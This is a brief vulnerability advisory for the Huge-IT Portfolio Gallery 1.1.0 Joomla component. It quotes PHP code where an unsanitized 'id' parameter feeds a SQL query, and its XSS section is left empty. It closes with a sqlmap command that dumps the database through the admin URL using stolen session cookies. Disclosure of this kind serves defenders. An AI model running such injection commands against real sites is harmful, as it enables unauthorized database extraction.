Title:Huge-IT Portfolio Gallery manager v1.1.0 SQL Injection and XSS
The attacker must be logged in with at least manager level access or access to the administrative panel to exploit this vulnerability:

XSS line 156 in : ./administrator/components/com_portfoliogallery/views/video/tmpl/default.php

155                         


In file administrator/components/com_portfoliogallery/models/portfoliogallery.php:  

variable id is passed without any sanitization to the SQL query being built starting at line 53:

 50     public function getPropertie() {
 51         $db = JFactory::getDBO();
 52         $id_cat = JRequest::getVar('id');
 53         $query = $db->getQuery(true);
 54         $query->select('#__huge_itportfolio_images.name as name,'
 55                 . '#__huge_itportfolio_images.id ,'
 56                 . '#__huge_itportfolio_portfolios.name as portName,'
 57                 . 'portfolio_id,#__huge_itportfolio_images.category as categ    ory, #__huge_itportfolio_images.description as description,image_url,sl_url,    sl_type,link_target,#__huge_itportfolio_images.ordering,#__huge_itportfolio_    images.published,published_in_sl_width');
 58         $query->from(array('#__huge_itportfolio_portfolios' => '#__huge_itpo    rtfolio_portfolios', '#__huge_itportfolio_images' => '#__huge_itportfolio_im    ages'));
 59         $query->where('#__huge_itportfolio_portfolios.id = portfolio_id')->w    here('portfolio_id=' . $id_cat);
 60         $query->order('ordering asc');
 61         $db->setQuery($query);
 62         $results = $db->loadObjectList();
 63         return $results;
sqlmap  --load-cookies=cookies.txt -u "http://192.168.0.125/administrator/index.php?option=com_portfoliogallery&view=portfoliogallery&id=*" --dbms mysql --dump